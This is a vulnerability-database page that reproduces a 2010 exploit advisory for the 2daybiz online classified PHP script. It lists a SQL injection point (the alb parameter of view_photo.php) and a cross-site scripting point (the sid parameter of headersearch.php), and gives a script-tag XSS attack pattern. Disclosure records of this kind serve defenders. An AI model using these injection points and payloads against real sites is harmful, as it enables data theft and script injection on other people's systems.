Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

2DayBiz Online Classified System - SQL Injection / Cross-Site Scripting

Related Vulnerabilities: CVE-2010-5019   CVE-2010-5018  
Publish Date: 16 Jun 2010
Author: Sid3^effects
Source / Download Exploit 
                							

                Name : 2daybiz online classified system SQLi AND XSS Vulnerability
Date : june, 16 2010
Vendor url :http://www.2daybiz.com/online_classified_script.html
Critical Level 	: HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
DESCRIPTION:
2daybiz online classified system allows you to start a fully automated classified ads site that includes essential features present in major classifieds sites. Our powerful script written in PHP allows your users to post new ads, for which you can charge a predefined amount. Billing is handled automatically and seamlessly through many of the popular payment gateways. Our classified ads software is fast, simple and fully customized through our built-in editor.

#######################################################################################################
Xploit: SQLI Vulnerability 

DEMO URL : http://[site]/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
###############################################################################################################
Xploit: XSS Vulnerability 

Attack Pattern: '"--><script>alert(0x000872)</script>
DEMO URL :http://[site]/products/classified/headersearch.php?sid=[XSS]
###############################################################################################################
# 0day no more 
# Sid3^effects

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started